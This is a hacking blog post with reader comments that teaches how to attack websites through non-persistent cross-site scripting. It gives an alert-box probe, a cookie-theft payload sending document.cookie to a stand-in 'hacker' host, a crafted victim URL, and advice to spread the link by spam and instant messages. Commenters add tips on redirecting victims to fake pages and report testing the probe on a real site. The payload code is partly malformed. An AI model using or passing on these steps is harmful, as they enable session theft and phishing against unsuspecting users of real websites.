How to hack a website using Cross site scripting (XSS)

What is  Cross site scripting :-

As quoted in wiky
"Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites were roughly 80% of all security vulnerabilities documented by Symantec as of 2007. Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site, and the nature of any security mitigations implemented by the site's owner."

There is no single, standardized classification of cross-site scripting flaws. but most 
experts distinguish between at least two primary flavors of XSS non-persistent
and persistent to know whats persistent and non persistent click here

In this tutorial i will explain about  Non-Persitent attack 

First of all you must find a vulnerable site .( for this you can refer
my post on How to find a vulnarable site )

After finding  a site enter a simple java script given bellow in the serch box or url bar
<SCRIPT>alert("XSS testing by");

 If a dialog box  pops up as shown then the site it is vulnerable to xss

In the above example we added a harmless alert dialog box
In the next example i will show you how we can add  more sophisticated and
dangours XSS attack to exploit users
One typical example is a simple cookie theft exploit

 var+img=new+Image();img.src= "http://hacker/"%20+%20                            document.cookie;

The previous JavaScript creates an image DOM object.

var img=new Image();

Since the JavaScript code executed within the http://victim/ context, it has access to the cookies

The image object is then redirected to hackers website where the victim cookies are stored


Once the hacker has completed his exploit code, which looks like

http://victim/ context=">">+var+img=new+Image();img.src= "http://hacker/document.cookie;

Now the hacker will advertise this specially crafted link through spam e-mail , message board posts, Instant Message (IM)messages, and others, trying to attract user clicks. What makes this attack so effective is that
Users are more likely to click on the link because the URL contains the real Web site domain name, rather than a look-alike domain name address as in normal phishing

Hope you liked this post if you have any doubts please be free to comment

Subscribe to Hackaholic

Enjoyed this article?
Subscribe to "Hackaholic"and get daily
updates in your inbox for free!

Related Posts Plugin for WordPress, Blogger...


If you dont mind.. can you make it some more clearer..
I have executed the simple alert box script in a vulnerable site... but what is the effect of it?? i.e how can the victim see it?

John said on September 3, 2011 at 6:58 AM :

@ Anonymous

You can by sending the url to ur victim , You can change the box to anything for (eg) u can redirect the victim to a fake page

Now the victim wont doubt because the URL contains the real Web sitedomain name !!

Read more:

piyush23 said on September 26, 2011 at 1:51 AM :

This is completely new information to me and surely i will these steps, Now i am going to bookmark this website.Register a Domain

simran said on March 2, 2012 at 4:38 AM :

This blog Is very informative , I am really pleased to post my comment on this blog . It helped me with ocean of knowledge so I really belive you will do much better in the future . Good job web master .

sikiduck said on May 9, 2012 at 5:31 AM :

I went to the same site as you (the russian federation site) to try the script out, but nothing happens when I type the script in the url?
So it looks like this: <*CRIPT>alert("XSS testing by");
(replace * with S)

I just get some russian text on the site :/
Whats wrong? Please help me. Thanks!

Mohd Shukri Bin Ridzuan said on November 16, 2012 at 8:27 PM :

Can you teach me everything about website hacking.

Olive Arnold said on April 7, 2014 at 4:51 AM :

Excellent post

php development


Use the form below to comment. No spam please!!!

© 101hacker | Design by Mukund edited by John
Powered by Blogger